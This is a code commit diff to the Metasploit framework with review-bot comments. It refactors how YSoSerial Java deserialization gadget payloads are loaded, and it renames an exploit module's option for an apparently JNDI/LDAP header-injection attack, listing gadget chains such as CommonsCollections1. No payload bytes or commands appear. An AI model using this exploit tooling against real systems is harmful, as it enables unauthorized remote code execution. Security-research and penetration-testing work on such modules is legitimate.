Use an enum for the YSoSerial payload option
This commit is contained in:
parent
3cb70c01bf
commit
f56f328c8d
|
@ -10,19 +10,7 @@ class JavaDeserialization
|
|||
PAYLOAD_FILENAME = "ysoserial_payloads.json"
|
||||
|
||||
def self.ysoserial_payload(payload_name, command=nil, modified_type: 'none')
|
||||
# Open the JSON file and parse it
|
||||
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
|
||||
begin
|
||||
json = JSON.parse(File.read(path))
|
||||
rescue Errno::ENOENT, JSON::ParserError
|
||||
raise RuntimeError, "Unable to load JSON data from: #{path}"
|
||||
end
|
||||
|
||||
# Extract the specified payload type (including cmd, bash, powershell, none)
|
||||
payloads_json = json[modified_type.to_s]
|
||||
if payloads_json.nil?
|
||||
raise ArgumentError, "#{modified_type} type not found in ysoserial payloads"
|
||||
end
|
||||
payloads_json = load_ysoserial_data(modified_type)
|
||||
|
||||
# Extract the specified payload (status, lengthOffset, bufferOffset, bytes)
|
||||
payload = payloads_json[payload_name]
|
||||
|
@ -67,6 +55,33 @@ class JavaDeserialization
|
|||
end
|
||||
end
|
||||
|
||||
def self.ysoserial_payload_names(modified_type: 'none')
|
||||
payloads_json = load_ysoserial_data(modified_type)
|
||||
payloads_json.keys
|
||||
end
|
||||
|
||||
class << self
|
||||
private
|
||||
|
||||
def load_ysoserial_data(modified_type)
|
||||
# Open the JSON file and parse it
|
||||
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
|
||||
begin
|
||||
json = JSON.parse(File.read(path))
|
||||
rescue Errno::ENOENT, JSON::ParserError
|
||||
raise RuntimeError, "Unable to load JSON data from: #{path}"
|
||||
end
|
||||
|
||||
# Extract the specified payload type (including cmd, bash, powershell, none)
|
||||
payloads_json = json[modified_type.to_s]
|
||||
if payloads_json.nil?
|
||||
raise ArgumentError, "#{modified_type} type not found in ysoserial payloads"
|
||||
end
|
||||
|
||||
payloads_json
|
||||
end
|
||||
end
|
||||
|
||||
end # JavaDeserialization
|
||||
end # Util
|
||||
end # Msf
|
||||
|
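Review bot: `load_ysoserial_data` re-reads and re-parses `ysoserial_payloads.json` from disk on every call, and with the new `ysoserial_payload_names` it is now invoked whenever a module builds its option list as well as at payload generation time. The parsed document does not change at runtime, so it can be memoized on the class with `json = @ysoserial_json ||= JSON.parse(File.read(path))` in place of the `json = JSON.parse(File.read(path))` line, which keeps the existing rescue and error message and saves a file read per module instantiation. The helper also has no documentation; a header such as `# Returns the payload hash for +modified_type+ from ysoserial_payloads.json; raises RuntimeError if the file is missing or unparseable and ArgumentError if the type is not present` would make its two failure modes explicit for callers. Note that `ysoserial_payload_names` returns every key of the type section, which presumably are all payload names; if the data file ever carries non-payload keys under a type this would need a filter.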
|
|
@ -75,9 +75,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
|
||||
OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
|
||||
OptString.new('HTTP_HEADER', [ true, 'The header to inject', 'X-Api-Version']),
|
||||
OptEnum.new('YSOSERIAL_LIB', [
|
||||
true, 'Ysoserial library for deserialization', '',
|
||||
%w[CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 Groovy1 Hibernate1 JBossInterceptors1 JSON1 JavassistWeld1 Jdk7u21 MozillaRhino1 Myfaces1 ROME Spring1 Spring2]
|
||||
OptEnum.new('YSOSERIAL_PAYLOAD', [
|
||||
true, 'Ysoserial payload to use for deserialization', '',
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload_names
|
||||
]),
|
||||
OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080]),
|
||||
OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true]),
|
||||
|
@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'javaCodebase'.to_ber, [ resource_url_string.to_ber ].to_ber_set ].to_ber_sequence,
|
||||
]
|
||||
else
|
||||
java_payload = generate_java_deserialization_for_payload(datastore['YSOSERIAL_LIB'], payload)
|
||||
java_payload = generate_java_deserialization_for_payload(datastore['YSOSERIAL_PAYLOAD'], payload)
|
||||
# vprint_good("Serialized java payload: #{java_payload}")
|
||||
attrs = [
|
||||
[ 'javaClassName'.to_ber, [ 'foo'.to_ber ].to_ber_set ].to_ber_sequence,
|
||||
|
|
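Review bot: Renaming the datastore option from `YSOSERIAL_LIB` to `YSOSERIAL_PAYLOAD` silently breaks any resource script or automation that sets the old name; if the old option has already shipped, register the new one with an alias so existing users keep working, e.g. `OptEnum.new('YSOSERIAL_PAYLOAD', [true, 'Ysoserial payload to use for deserialization', '', Msf::Util::JavaDeserialization.ysoserial_payload_names], aliases: ['YSOSERIAL_LIB'])`, assuming this framework version supports option aliases. The option is required but its default is `''`, which is not one of the enum values, so the module cannot run until the user picks one; a default taken from the list (the removed list began with CommonsBeanutils1, which presumably is still present in the data file) would match the other options here, which all carry usable defaults. Because `ysoserial_payload_names` reads and parses the data file, the option list is now built on every module instantiation and a missing or unparseable `ysoserial_payloads.json` raises from `initialize` rather than at exploit time; that is likely acceptable for a bundled data file but worth a comment next to the option. The `else` branch in the second hunk and the method containing it start and end outside the hunk.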